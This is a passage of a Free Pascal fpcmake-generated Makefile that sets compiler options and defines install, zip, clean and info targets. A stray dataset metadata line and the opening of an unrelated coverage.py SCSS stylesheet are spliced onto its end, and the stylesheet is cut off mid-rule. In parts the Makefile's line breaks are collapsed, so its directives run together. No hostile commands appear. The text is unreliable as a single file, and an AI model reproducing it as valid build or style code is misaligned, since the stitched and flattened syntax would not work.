UNITDIR_FPMKUNIT=$(PACKAGEDIR_FPMKUNIT)/units/$(TARGETSUFFIX) else UNITDIR_FPMKUNIT=$(PACKAGEDIR_FPMKUNIT) endif ifneq ($(wildcard $(PACKAGEDIR_FPMKUNIT)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_FPMKUNIT=$(PACKAGEDIR_FPMKUNIT)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_FPMKUNIT)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_FPMKUNIT=$(PACKAGEDIR_FPMKUNIT)/units_bs/$(SOURCESUFFIX) else UNITDIR_FPMAKE_FPMKUNIT=$(PACKAGEDIR_FPMKUNIT) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_FPMKUNIT)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_FPMKUNIT) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_FPMKUNIT)/$(FPCMADE) endif else PACKAGEDIR_FPMKUNIT= UNITDIR_FPMKUNIT:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /fpmkunit/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_FPMKUNIT),) UNITDIR_FPMKUNIT:=$(firstword $(UNITDIR_FPMKUNIT)) else UNITDIR_FPMKUNIT= endif endif ifdef UNITDIR_FPMKUNIT override COMPILER_UNITDIR+=$(UNITDIR_FPMKUNIT) endif ifdef UNITDIR_FPMAKE_FPMKUNIT override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_FPMKUNIT) endif endif ifndef NOCPUDEF override FPCOPTDEF=$(ARCH) 
endif
ifneq ($(OS_TARGET),$(OS_SOURCE))
override FPCOPT+=-T$(OS_TARGET)
endif
ifneq ($(CPU_TARGET),$(CPU_SOURCE))
override FPCOPT+=-P$(ARCH)
endif
ifeq ($(OS_SOURCE),openbsd)
override FPCOPT+=-FD$(NEW_BINUTILS_PATH)
override FPCMAKEOPT+=-FD$(NEW_BINUTILS_PATH)
override FPMAKE_BUILD_OPT+=-FD$(NEW_BINUTILS_PATH)
endif
ifndef CROSSBOOTSTRAP
ifneq ($(BINUTILSPREFIX),)
override FPCOPT+=-XP$(BINUTILSPREFIX)
endif
ifneq ($(BINUTILSPREFIX),)
override FPCOPT+=-Xr$(RLINKPATH)
endif
endif
ifndef CROSSCOMPILE
ifneq ($(BINUTILSPREFIX),)
override FPCMAKEOPT+=-XP$(BINUTILSPREFIX)
override FPMAKE_BUILD_OPT+=-XP$(BINUTILSPREFIX)
endif
endif
ifdef UNITDIR
override FPCOPT+=$(addprefix -Fu,$(UNITDIR))
endif
ifdef LIBDIR
override FPCOPT+=$(addprefix -Fl,$(LIBDIR))
endif
ifdef OBJDIR
override FPCOPT+=$(addprefix -Fo,$(OBJDIR))
endif
ifdef INCDIR
override FPCOPT+=$(addprefix -Fi,$(INCDIR))
endif
ifdef LINKSMART
override FPCOPT+=-XX
endif
ifdef CREATESMART
override FPCOPT+=-CX
endif
ifdef DEBUG
override FPCOPT+=-gl
override FPCOPTDEF+=DEBUG
endif
ifdef RELEASE
FPCCPUOPT:=-O2
override FPCOPT+=-Ur -Xs $(FPCCPUOPT) -n
override FPCOPTDEF+=RELEASE
endif
ifdef STRIP
override FPCOPT+=-Xs
endif
ifdef OPTIMIZE
override FPCOPT+=-O2
endif
ifdef VERBOSE
override FPCOPT+=-vwni
endif
ifdef COMPILER_OPTIONS
override FPCOPT+=$(COMPILER_OPTIONS)
endif
ifdef COMPILER_UNITDIR
override FPCOPT+=$(addprefix -Fu,$(COMPILER_UNITDIR))
endif
ifdef COMPILER_LIBRARYDIR
override FPCOPT+=$(addprefix -Fl,$(COMPILER_LIBRARYDIR))
endif
ifdef COMPILER_OBJECTDIR
override FPCOPT+=$(addprefix -Fo,$(COMPILER_OBJECTDIR))
endif
ifdef COMPILER_INCLUDEDIR
override FPCOPT+=$(addprefix -Fi,$(COMPILER_INCLUDEDIR))
endif
ifdef CROSSBINDIR
override FPCOPT+=-FD$(CROSSBINDIR)
endif
ifdef COMPILER_TARGETDIR
override FPCOPT+=-FE$(COMPILER_TARGETDIR)
ifeq ($(COMPILER_TARGETDIR),.)
override TARGETDIRPREFIX=
else
override TARGETDIRPREFIX=$(COMPILER_TARGETDIR)/
endif
endif
ifdef COMPILER_UNITTARGETDIR
override FPCOPT+=-FU$(COMPILER_UNITTARGETDIR)
ifeq ($(COMPILER_UNITTARGETDIR),.)
override UNITTARGETDIRPREFIX= else override UNITTARGETDIRPREFIX=$(COMPILER_UNITTARGETDIR)/ endif else ifdef COMPILER_TARGETDIR override COMPILER_UNITTARGETDIR=$(COMPILER_TARGETDIR) override UNITTARGETDIRPREFIX=$(TARGETDIRPREFIX) endif endif ifdef CREATESHARED override FPCOPT+=-Cg endif ifneq ($(findstring $(OS_TARGET),dragonfly freebsd openbsd netbsd linux solaris),) ifneq ($(findstring $(CPU_TARGET),x86_64 mips mipsel),) override FPCOPT+=-Cg endif endif ifdef LINKSHARED endif ifdef GCCLIBDIR override FPCOPT+=-Fl$(GCCLIBDIR) ifdef FPCMAKEGCCLIBDIR override FPCMAKEOPT+=-Fl$(FPCMAKEGCCLIBDIR) else override FPCMAKEOPT+=-Fl$(GCCLIBDIR) endif endif ifdef OTHERLIBDIR override FPCOPT+=$(addprefix -Fl,$(OTHERLIBDIR)) endif ifdef OPT override FPCOPT+=$(OPT) endif ifdef FPMAKEBUILDOPT override FPMAKE_BUILD_OPT+=$(FPMAKEBUILDOPT) endif ifdef FPCOPTDEF override FPCOPT+=$(addprefix -d,$(FPCOPTDEF)) endif ifdef CFGFILE override FPCOPT+=@$(CFGFILE) endif ifdef USEENV override FPCEXTCMD:=$(FPCOPT) override FPCOPT:=!FPCEXTCMD export FPCEXTCMD endif override AFULL_TARGET=$(CPU_TARGET)-$(OS_TARGET) override AFULL_SOURCE=$(CPU_SOURCE)-$(OS_SOURCE) ifneq ($(AFULL_TARGET),$(AFULL_SOURCE)) override ACROSSCOMPILE=1 endif ifdef ACROSSCOMPILE override FPCOPT+=$(CROSSOPT) endif override COMPILER:=$(strip $(FPC) $(FPCOPT)) ifneq (,$(findstring -sh ,$(COMPILER))) UseEXECPPAS=1 endif ifneq (,$(findstring -s ,$(COMPILER))) ifeq ($(FULL_SOURCE),$(FULL_TARGET)) UseEXECPPAS=1 endif endif ifneq ($(UseEXECPPAS),1) EXECPPAS= else ifdef RUNBATCH EXECPPAS:=@$(RUNBATCH) $(PPAS) else EXECPPAS:=@$(PPAS) endif endif ifdef TARGET_RSTS override RSTFILES=$(addsuffix $(RSTEXT),$(TARGET_RSTS)) override CLEANRSTFILES+=$(RSTFILES) endif .PHONY: fpc_install fpc_sourceinstall fpc_exampleinstall ifdef INSTALL_UNITS override INSTALLPPUFILES+=$(addsuffix $(PPUEXT),$(INSTALL_UNITS)) endif ifdef INSTALL_BUILDUNIT override INSTALLPPUFILES:=$(filter-out $(INSTALL_BUILDUNIT)$(PPUEXT),$(INSTALLPPUFILES)) endif ifdef INSTALLPPUFILES ifneq ($(IMPORTLIBPREFIX)-$(STATICLIBEXT),$(STATICLIBPREFIX)-$(STATICLIBEXT)) override INSTALLPPULINKFILES:=$(subst $(PPUEXT),$(OEXT),$(INSTALLPPUFILES)) $(subst $(PPUEXT),$(LTOEXT),$(INSTALLPPUFILES)) $(addprefix $(STATICLIBPREFIX),$(subst $(PPUEXT),$(STATICLIBEXT),$(INSTALLPPUFILES))) $(addprefix $(IMPORTLIBPREFIX),$(subst $(PPUEXT),$(STATICLIBEXT),$(INSTALLPPUFILES))) else override INSTALLPPULINKFILES:=$(subst $(PPUEXT),$(OEXT),$(INSTALLPPUFILES)) $(subst $(PPUEXT),$(LTOEXT),$(INSTALLPPUFILES)) $(addprefix $(STATICLIBPREFIX),$(subst $(PPUEXT),$(STATICLIBEXT),$(INSTALLPPUFILES))) endif ifneq ($(UNITTARGETDIRPREFIX),) override INSTALLPPUFILENAMES:=$(notdir $(INSTALLPPUFILES)) override INSTALLPPULINKFILENAMES:=$(notdir $(INSTALLPPULINKFILES)) override INSTALLPPUFILES=$(addprefix $(UNITTARGETDIRPREFIX),$(INSTALLPPUFILENAMES)) override INSTALLPPULINKFILES=$(wildcard $(addprefix $(UNITTARGETDIRPREFIX),$(INSTALLPPULINKFILENAMES))) endif override INSTALL_CREATEPACKAGEFPC=1 endif ifdef INSTALLEXEFILES ifneq ($(TARGETDIRPREFIX),) override INSTALLEXEFILES:=$(addprefix $(TARGETDIRPREFIX),$(notdir $(INSTALLEXEFILES))) endif endif fpc_install: all $(INSTALLTARGET) ifdef INSTALLEXEFILES $(MKDIR) $(INSTALL_BINDIR) $(INSTALLEXE) $(INSTALLEXEFILES) $(INSTALL_BINDIR) endif ifdef INSTALL_CREATEPACKAGEFPC ifdef FPCMAKE ifdef PACKAGE_VERSION ifneq ($(wildcard Makefile.fpc),) $(FPCMAKE) -p -T$(CPU_TARGET)-$(OS_TARGET) Makefile.fpc $(MKDIR) $(INSTALL_UNITDIR) $(INSTALL) Package.fpc $(INSTALL_UNITDIR) endif endif endif endif ifdef 
INSTALLPPUFILES $(MKDIR) $(INSTALL_UNITDIR) $(INSTALL) $(INSTALLPPUFILES) $(INSTALL_UNITDIR) ifneq ($(INSTALLPPULINKFILES),) $(INSTALL) $(INSTALLPPULINKFILES) $(INSTALL_UNITDIR) endif ifneq ($(wildcard $(LIB_FULLNAME)),) $(MKDIR) $(INSTALL_LIBDIR) $(INSTALL) $(LIB_FULLNAME) $(INSTALL_LIBDIR) ifdef inUnix ln -sf $(LIB_FULLNAME) $(INSTALL_LIBDIR)/$(LIB_NAME) endif endif endif ifdef INSTALL_FILES $(MKDIR) $(INSTALL_DATADIR) $(INSTALL) $(INSTALL_FILES) $(INSTALL_DATADIR) endif fpc_sourceinstall: distclean $(MKDIR) $(INSTALL_SOURCEDIR) $(COPYTREE) $(BASEDIR)/* $(INSTALL_SOURCEDIR) fpc_exampleinstall: $(EXAMPLEINSTALLTARGET) $(addsuffix _distclean,$(TARGET_EXAMPLEDIRS)) ifdef HASEXAMPLES $(MKDIR) $(INSTALL_EXAMPLEDIR) endif ifdef EXAMPLESOURCEFILES $(COPY) $(EXAMPLESOURCEFILES) $(INSTALL_EXAMPLEDIR) endif ifdef TARGET_EXAMPLEDIRS $(COPYTREE) $(addsuffix /*,$(TARGET_EXAMPLEDIRS)) $(INSTALL_EXAMPLEDIR) endif .PHONY: fpc_distinstall fpc_distinstall: install exampleinstall .PHONY: fpc_zipinstall fpc_zipsourceinstall fpc_zipexampleinstall ifndef PACKDIR ifndef inUnix PACKDIR=$(BASEDIR)/../fpc-pack else PACKDIR=/tmp/fpc-pack endif endif ifndef ZIPNAME ifdef DIST_ZIPNAME ZIPNAME=$(DIST_ZIPNAME) else ZIPNAME=$(PACKAGE_NAME) endif endif ifndef FULLZIPNAME FULLZIPNAME=$(ZIPCROSSPREFIX)$(ZIPPREFIX)$(ZIPNAME)$(ZIPSUFFIX) endif ifndef ZIPTARGET ifdef DIST_ZIPTARGET ZIPTARGET=DIST_ZIPTARGET else ZIPTARGET=install endif endif ifndef USEZIP ifdef inUnix USETAR=1 endif endif ifndef inUnix USEZIPWRAPPER=1 endif ifdef USEZIPWRAPPER ZIPPATHSEP=$(PATHSEP) ZIPWRAPPER=$(subst /,$(PATHSEP),$(DIST_DESTDIR)/fpczip$(SRCBATCHEXT)) else ZIPPATHSEP=/ endif ZIPCMD_CDPACK:=cd $(subst /,$(ZIPPATHSEP),$(PACKDIR)) ZIPCMD_CDBASE:=cd $(subst /,$(ZIPPATHSEP),$(BASEDIR)) ifdef USETAR ZIPDESTFILE:=$(DIST_DESTDIR)/$(FULLZIPNAME)$(TAREXT) ZIPCMD_ZIP:=$(TARPROG) c$(TAROPT)f $(ZIPDESTFILE) * else ZIPDESTFILE:=$(DIST_DESTDIR)/$(FULLZIPNAME)$(ZIPEXT) ZIPCMD_ZIP:=$(subst /,$(ZIPPATHSEP),$(ZIPPROG)) -Dr $(ZIPOPT) $(ZIPDESTFILE) * endif fpc_zipinstall: $(MAKE) $(ZIPTARGET) INSTALL_PREFIX=$(PACKDIR) ZIPINSTALL=1 $(MKDIR) $(DIST_DESTDIR) $(DEL) $(ZIPDESTFILE) ifdef USEZIPWRAPPER ifneq ($(ECHOREDIR),echo) $(ECHOREDIR) -e "$(subst \,\\,$(ZIPCMD_CDPACK))" > $(ZIPWRAPPER) $(ECHOREDIR) -e "$(subst \,\\,$(ZIPCMD_ZIP))" >> $(ZIPWRAPPER) $(ECHOREDIR) -e "$(subst \,\\,$(ZIPCMD_CDBASE))" >> $(ZIPWRAPPER) else echo $(ZIPCMD_CDPACK) > $(ZIPWRAPPER) echo $(ZIPCMD_ZIP) >> $(ZIPWRAPPER) echo $(ZIPCMD_CDBASE) >> $(ZIPWRAPPER) endif ifdef inUnix /bin/sh $(ZIPWRAPPER) else ifdef RUNBATCH $(RUNBATCH) $(ZIPWRAPPER) else $(ZIPWRAPPER) endif endif $(DEL) $(ZIPWRAPPER) else $(ZIPCMD_CDPACK) ; $(ZIPCMD_ZIP) ; $(ZIPCMD_CDBASE) endif $(DELTREE) $(PACKDIR) fpc_zipsourceinstall: $(MAKE) fpc_zipinstall ZIPTARGET=sourceinstall ZIPSUFFIX=$(ZIPSOURCESUFFIX) fpc_zipexampleinstall: ifdef HASEXAMPLES $(MAKE) fpc_zipinstall ZIPTARGET=exampleinstall ZIPSUFFIX=$(ZIPEXAMPLESUFFIX) endif fpc_zipdistinstall: $(MAKE) fpc_zipinstall ZIPTARGET=distinstall .PHONY: fpc_clean fpc_cleanall fpc_distclean ifdef EXEFILES override CLEANEXEFILES:=$(addprefix $(TARGETDIRPREFIX),$(CLEANEXEFILES)) override CLEANEXEDBGFILES:=$(addprefix $(TARGETDIRPREFIX),$(CLEANEXEDBGFILES)) endif ifdef CLEAN_PROGRAMS override CLEANEXEFILES+=$(addprefix $(TARGETDIRPREFIX),$(addsuffix $(EXEEXT), $(CLEAN_PROGRAMS))) override CLEANEXEDBGFILES+=$(addprefix $(TARGETDIRPREFIX),$(addsuffix $(EXEDBGEXT), $(CLEAN_PROGRAMS))) endif ifdef CLEAN_UNITS override CLEANPPUFILES+=$(addsuffix $(PPUEXT),$(CLEAN_UNITS)) endif ifdef 
CLEANPPUFILES override CLEANPPULINKFILES:=$(subst $(PPUEXT),$(OEXT),$(CLEANPPUFILES)) $(subst $(PPUEXT),$(LTOEXT),$(CLEANPPUFILES)) $(addprefix $(STATICLIBPREFIX),$(subst $(PPUEXT),$(STATICLIBEXT),$(CLEANPPUFILES))) $(addprefix $(IMPORTLIBPREFIX),$(subst $(PPUEXT),$(STATICLIBEXT),$(CLEANPPUFILES))) ifdef DEBUGSYMEXT override CLEANPPULINKFILES+=$(subst $(PPUEXT),$(DEBUGSYMEXT),$(CLEANPPUFILES)) endif override CLEANPPUFILENAMES:=$(CLEANPPUFILES) override CLEANPPUFILES=$(addprefix $(UNITTARGETDIRPREFIX),$(CLEANPPUFILENAMES)) override CLEANPPULINKFILENAMES:=$(CLEANPPULINKFILES) override CLEANPPULINKFILES=$(wildcard $(addprefix $(UNITTARGETDIRPREFIX),$(CLEANPPULINKFILENAMES))) endif fpc_clean: $(CLEANTARGET) ifdef CLEANEXEFILES -$(DEL) $(CLEANEXEFILES) endif ifdef CLEANEXEDBGFILES -$(DELTREE) $(CLEANEXEDBGFILES) endif ifdef CLEANPPUFILES -$(DEL) $(CLEANPPUFILES) endif ifneq ($(CLEANPPULINKFILES),) -$(DEL) $(CLEANPPULINKFILES) endif ifdef CLEANRSTFILES -$(DEL) $(addprefix $(UNITTARGETDIRPREFIX),$(CLEANRSTFILES)) endif ifdef CLEAN_FILES -$(DEL) $(CLEAN_FILES) endif ifdef LIB_NAME -$(DEL) $(LIB_NAME) $(LIB_FULLNAME) endif -$(DEL) $(FPCMADE) *$(FULL_TARGET).fpm Package.fpc *$(ASMEXT) -$(DEL) $(FPCEXTFILE) $(REDIRFILE) script*.res link*.res *_script.res *_link.res -$(DEL) $(PPAS) *_ppas$(BATCHEXT) ppas$(BATCHEXT) ppaslink$(BATCHEXT) fpc_cleanall: $(CLEANTARGET) ifdef CLEANEXEFILES -$(DEL) $(CLEANEXEFILES) endif ifdef COMPILER_UNITTARGETDIR ifdef CLEANPPUFILES -$(DEL) $(CLEANPPUFILES) endif ifneq ($(CLEANPPULINKFILES),) -$(DEL) $(CLEANPPULINKFILES) endif ifdef CLEANRSTFILES -$(DEL) $(addprefix $(UNITTARGETDIRPREFIX),$(CLEANRSTFILES)) endif endif ifdef CLEAN_FILES -$(DEL) $(CLEAN_FILES) endif -$(DELTREE) units -$(DELTREE) bin -$(DEL) *$(OEXT) *$(LTOEXT) *$(PPUEXT) *$(RSTEXT) *$(ASMEXT) *$(STATICLIBEXT) *$(SHAREDLIBEXT) *$(PPLEXT) ifneq ($(PPUEXT),.ppu) -$(DEL) *.o *.ppu *.a endif -$(DELTREE) *$(SMARTEXT) -$(DEL) fpcmade.* Package.fpc *.fpm -$(DEL) $(FPCEXTFILE) $(REDIRFILE) script*.res link*.res *_script.res *_link.res -$(DEL) $(PPAS) *_ppas$(BATCHEXT) ppas$(BATCHEXT) ppaslink$(BATCHEXT) ifdef AOUTEXT -$(DEL) *$(AOUTEXT) endif ifdef DEBUGSYMEXT -$(DEL) *$(DEBUGSYMEXT) endif ifdef LOCALFPMAKEBIN -$(DEL) $(LOCALFPMAKEBIN) -$(DEL) $(FPMAKEBINOBJ) endif fpc_distclean: cleanall .PHONY: fpc_baseinfo override INFORULES+=fpc_baseinfo fpc_baseinfo: @$(ECHO) @$(ECHO) == Package info == @$(ECHO) Package Name..... $(PACKAGE_NAME) @$(ECHO) Package Version.. $(PACKAGE_VERSION) @$(ECHO) @$(ECHO) == Configuration info == @$(ECHO) @$(ECHO) FPC.......... $(FPC) @$(ECHO) FPC Version.. $(FPC_VERSION) @$(ECHO) Source CPU... $(CPU_SOURCE) @$(ECHO) Target CPU... $(CPU_TARGET) @$(ECHO) Source OS.... $(OS_SOURCE) @$(ECHO) Target OS.... $(OS_TARGET) @$(ECHO) Full Source.. $(FULL_SOURCE) @$(ECHO) Full Target.. $(FULL_TARGET) @$(ECHO) SourceSuffix. $(SOURCESUFFIX) @$(ECHO) TargetSuffix. $(TARGETSUFFIX) @$(ECHO) FPC fpmake... $(FPCFPMAKE) @$(ECHO) @$(ECHO) == Directory info == @$(ECHO) @$(ECHO) Required pkgs... $(REQUIRE_PACKAGES) @$(ECHO) @$(ECHO) Basedir......... $(BASEDIR) @$(ECHO) FPCDir.......... $(FPCDIR) @$(ECHO) CrossBinDir..... $(CROSSBINDIR) @$(ECHO) UnitsDir........ $(UNITSDIR) @$(ECHO) PackagesDir..... $(PACKAGESDIR) @$(ECHO) @$(ECHO) GCC library..... $(GCCLIBDIR) @$(ECHO) Other library... $(OTHERLIBDIR) @$(ECHO) @$(ECHO) == Tools info == @$(ECHO) @$(ECHO) As........ $(AS) @$(ECHO) Ld........ $(LD) @$(ECHO) Ar........ $(AR) @$(ECHO) Rc........ $(RC) @$(ECHO) @$(ECHO) Mv........ $(MVPROG) @$(ECHO) Cp........ 
$(CPPROG) @$(ECHO) Rm........ $(RMPROG) @$(ECHO) GInstall.. $(GINSTALL) @$(ECHO) Echo...... $(ECHO) @$(ECHO) Shell..... $(SHELL) @$(ECHO) Date...... $(DATE) @$(ECHO) FPCMake... $(FPCMAKE) @$(ECHO) PPUMove... $(PPUMOVE) @$(ECHO) Zip....... $(ZIPPROG) @$(ECHO) @$(ECHO) == Object info == @$(ECHO) @$(ECHO) Target Loaders........ $(TARGET_LOADERS) @$(ECHO) Target Units.......... $(TARGET_UNITS) @$(ECHO) Target Implicit Units. $(TARGET_IMPLICITUNITS) @$(ECHO) Target Programs....... $(TARGET_PROGRAMS) @$(ECHO) Target Dirs........... $(TARGET_DIRS) @$(ECHO) Target Examples....... $(TARGET_EXAMPLES) @$(ECHO) Target ExampleDirs.... $(TARGET_EXAMPLEDIRS) @$(ECHO) @$(ECHO) Clean Units......... $(CLEAN_UNITS) @$(ECHO) Clean Files......... $(CLEAN_FILES) @$(ECHO) @$(ECHO) Install Units....... $(INSTALL_UNITS) @$(ECHO) Install Files....... $(INSTALL_FILES) @$(ECHO) @$(ECHO) == Install info == @$(ECHO) @$(ECHO) DateStr.............. $(DATESTR) @$(ECHO) ZipName.............. $(ZIPNAME) @$(ECHO) ZipPrefix............ $(ZIPPREFIX) @$(ECHO) ZipCrossPrefix....... $(ZIPCROSSPREFIX) @$(ECHO) ZipSuffix............ $(ZIPSUFFIX) @$(ECHO) FullZipName.......... $(FULLZIPNAME) @$(ECHO) Install FPC Package.. $(INSTALL_FPCPACKAGE) @$(ECHO) @$(ECHO) Install base dir..... $(INSTALL_BASEDIR) @$(ECHO) Install binary dir... $(INSTALL_BINDIR) @$(ECHO) Install library dir.. $(INSTALL_LIBDIR) @$(ECHO) Install units dir.... $(INSTALL_UNITDIR) @$(ECHO) Install source dir... $(INSTALL_SOURCEDIR) @$(ECHO) Install doc dir...... $(INSTALL_DOCDIR) @$(ECHO) Install example dir.. $(INSTALL_EXAMPLEDIR) @$(ECHO) Install data dir..... $(INSTALL_DATADIR) @$(ECHO) @$(ECHO) Dist destination dir. $(DIST_DESTDIR) @$(ECHO) Dist zip name........ $(DIST_ZIPNAME) @$(ECHO) .PHONY: fpc_info fpc_info: $(INFORULES) .PHONY: fpc_makefile fpc_makefiles fpc_makefile_sub1 fpc_makefile_sub2 \ fpc_makefile_dirs fpc_makefile: $(FPCMAKE) -w -T$(OS_TARGET) Makefile.fpc fpc_makefile_sub1: ifdef TARGET_DIRS $(FPCMAKE) -w -T$(OS_TARGET) $(addsuffix /Makefile.fpc,$(TARGET_DIRS)) endif ifdef TARGET_EXAMPLEDIRS $(FPCMAKE) -w -T$(OS_TARGET) $(addsuffix /Makefile.fpc,$(TARGET_EXAMPLEDIRS)) endif fpc_makefile_sub2: $(addsuffix _makefile_dirs,$(TARGET_DIRS) $(TARGET_EXAMPLEDIRS)) fpc_makefile_dirs: fpc_makefile_sub1 fpc_makefile_sub2 fpc_makefiles: fpc_makefile fpc_makefile_dirs units: examples: shared: sourceinstall: fpc_sourceinstall exampleinstall: fpc_exampleinstall zipexampleinstall: fpc_zipexampleinstall info: fpc_info makefiles: fpc_makefiles .PHONY: units examples shared sourceinstall exampleinstall zipexampleinstall info makefiles ifneq ($(wildcard fpcmake.loc),) include fpcmake.loc endif override FPCOPT:=$(filter-out -FU%,$(FPCOPT)) override FPCOPT:=$(filter-out -FE%,$(FPCOPT)) override FPCOPT:=$(filter-out $(addprefix -Fu,$(COMPILER_UNITDIR)),$(FPCOPT))# Compose general fpmake-parameters ifdef FPMAKEOPT FPMAKE_OPT+=$(FPMAKEOPT) endif FPMAKE_OPT+=--localunitdir=../.. FPMAKE_OPT+=--globalunitdir=.. 
FPMAKE_OPT+=$(FPC_TARGETOPT) FPMAKE_OPT+=$(addprefix -o ,$(FPCOPT)) FPMAKE_OPT+=--compiler=$(FPC) FPMAKE_OPT+=-bu .NOTPARALLEL: fpmake$(SRCEXEEXT): fpmake.pp $(FPCFPMAKE) fpmake.pp $(FPMAKE_SKIP_CONFIG) $(addprefix -Fu,$(COMPILER_FPMAKE_UNITDIR)) $(FPCMAKEOPT) $(OPT) all: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) compile $(FPMAKE_OPT) smart: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) compile $(FPMAKE_OPT) -o -XX -o -CX release: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) compile $(FPMAKE_OPT) -o -dRELEASE debug: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) compile $(FPMAKE_OPT) -o -dDEBUG ifeq ($(FPMAKE_BIN_CLEAN),) clean: else clean: $(FPMAKE_BIN_CLEAN) clean $(FPMAKE_OPT) endif ifeq ($(FPMAKE_BIN_CLEAN),) distclean: $(addsuffix _distclean,$(TARGET_DIRS)) fpc_cleanall else distclean: ifdef inUnix { $(FPMAKE_BIN_CLEAN) distclean $(FPMAKE_OPT); if [ $$? != "0" ]; then { echo Something wrong with fpmake exectable. Remove the executable and call make recursively to recover.; $(DEL) $(FPMAKE_BIN_CLEAN); $(MAKE) fpc_cleanall; }; fi; } else $(FPMAKE_BIN_CLEAN) distclean $(FPMAKE_OPT) endif -$(DEL) $(LOCALFPMAKE) endif cleanall: distclean install: fpmake$(SRCEXEEXT) ifdef UNIXHier $(LOCALFPMAKE) install $(FPMAKE_OPT) --prefix=$(INSTALL_PREFIX) --baseinstalldir=$(INSTALL_LIBDIR)/fpc/$(FPC_VERSION) --unitinstalldir=$(INSTALL_UNITDIR) else $(LOCALFPMAKE) install $(FPMAKE_OPT) --prefix=$(INSTALL_BASEDIR) --baseinstalldir=$(INSTALL_BASEDIR) --unitinstalldir=$(INSTALL_UNITDIR) endif distinstall: fpmake$(SRCEXEEXT) ifdef UNIXHier $(LOCALFPMAKE) install $(FPMAKE_OPT) --prefix=$(INSTALL_PREFIX) --baseinstalldir=$(INSTALL_LIBDIR)/fpc/$(FPC_VERSION) --unitinstalldir=$(INSTALL_UNITDIR) -ie -fsp 0 else $(LOCALFPMAKE) install $(FPMAKE_OPT) --prefix=$(INSTALL_BASEDIR) --baseinstalldir=$(INSTALL_BASEDIR) --unitinstalldir=$(INSTALL_UNITDIR) -ie -fsp 0 endif zipinstall: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) zipinstall $(FPMAKE_OPT) --zipprefix=$(DIST_DESTDIR)/$(ZIPPREFIX) zipdistinstall: fpmake$(SRCEXEEXT) $(LOCALFPMAKE) zipinstall $(FPMAKE_OPT) --zipprefix=$(DIST_DESTDIR)/$(ZIPPREFIX) -ie -fsp 0 zipsourceinstall: fpmake$(SRCEXEEXT) ifdef UNIXHier $(LOCALFPMAKE) archive $(FPMAKE_OPT) --zipprefix=$(DIST_DESTDIR)/$(ZIPPREFIX) --prefix=share/src/fpc-\$$\(PACKAGEVERSION\)/$(INSTALL_FPCSUBDIR)/\$$\(PACKAGEDIRECTORY\) else $(LOCALFPMAKE) archive $(FPMAKE_OPT) --zipprefix=$(DIST_DESTDIR)/$(ZIPPREFIX) --prefix=source\\$(INSTALL_FPCSUBDIR)\\\$$\(PACKAGEDIRECTORY\) endif
{ "pile_set_name": "Github" }
/* Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0 */ /* For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt */ // CSS styles for coverage.py HTML reports. // When you edit this file, you need to run "make css" to get the CSS file // generated, and then check in both the .scss and the .css files. // When working on the file, this command is useful: // sass --watch --style=compact --sourcemap=none --no-cache coverage/htmlfiles/style.scss:htmlcov/style.css // // OR you can process sass purely in python with `pip install pysass`, then: // pysassc --style=compact coverage/htmlfiles/style.scss coverage/htmlfiles/style.css // Ignore this comment, it's for the CSS output file: /* Don't edit this .css file. Edit the .scss file instead! */ // Dimensions $left-gutter: 3rem; // // Declare colors and variables // $font-normal: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; $font-code: SFMono-Regular, Menlo, Monaco, Consolas, monospace; $off-button-lighten: 50%; $hover-dark-amt: 95%; $focus-color: #007acc; $mis-color: #ff0000; $run-color: #00dd00; $exc-color: #808080; $par-color: #dddd00; $light-bg: #fff; $light-fg: #000; $light-gray1: #f8f8f8; $light-gray2: #eee; $light-gray3: #ccc; $light-gray4: #999; $light-gray5: #666; $light-gray6: #333; $light-pln-bg: $light-bg; $light-mis-bg: #fdd; $light-run-bg: #dfd; $light-exc-bg: $light-gray2; $light-par-bg: #ffa; $light-token-com: #008000; $light-token-str: #0451A5; $light-context-bg-color: #aef; $dark-bg: #1e1e1e; $dark-fg: #eee; $dark-gray1: #222; $dark-gray2: #333; $dark-gray3: #444; $dark-gray4: #777; $dark-gray5: #aaa; $dark-gray6: #ddd; $dark-pln-bg: $dark-bg; $dark-mis-bg: #4b1818; $dark-run-bg: #373d29; $dark-exc-bg: $dark-gray2; $dark-par-bg: #650; $dark-token-com: #6A9955; $dark-token-str: #9CDCFE; $dark-context-bg-color: #056; // // Mixins and utilities // @mixin background-dark($color) { @media (prefers-color-scheme: dark) { background: $color; } } @mixin color-dark($color) { @media (prefers-color-scheme: dark) { color: $color; } } @mixin border-color-dark($color) { @media (prefers-color-scheme: dark) { border-color: $color; } } // Add visual outline to navigable elements on focus improve accessibility. @mixin focus-border { &:active, &:focus { outline: 2px dashed $focus-color; } } // Page-wide styles html, body, h1, h2, h3, p, table, td, th { margin: 0; padding: 0; border: 0; font-weight: inherit; font-style: inherit; font-size: 100%; font-family: inherit; vertical-align: baseline; } // Set baseline grid to 16 pt. 
body { font-family: $font-normal; font-size: 1em; background: $light-bg; color: $light-fg; @include background-dark($dark-bg); @include color-dark($dark-fg); } html>body { font-size: 16px; } a { @include focus-border; } p { font-size: .875em; line-height: 1.4em; } table { border-collapse: collapse; } td { vertical-align: top; } table tr.hidden { display: none !important; } p#no_rows { display: none; font-size: 1.2em; } a.nav { text-decoration: none; color: inherit; &:hover { text-decoration: underline; color: inherit; } } // Page structure #header { background: $light-gray1; @include background-dark(black); width: 100%; border-bottom: 1px solid $light-gray2; @include border-color-dark($dark-gray2); } .indexfile #footer { margin: 1rem 3rem; } .pyfile #footer { margin: 1rem 1rem; } #footer .content { padding: 0; color: $light-gray5; @include color-dark($dark-gray5); font-style: italic; } #index { margin: 1rem 0 0 3rem; } // Header styles #header .content { padding: 1rem $left-gutter; } h1 { font-size: 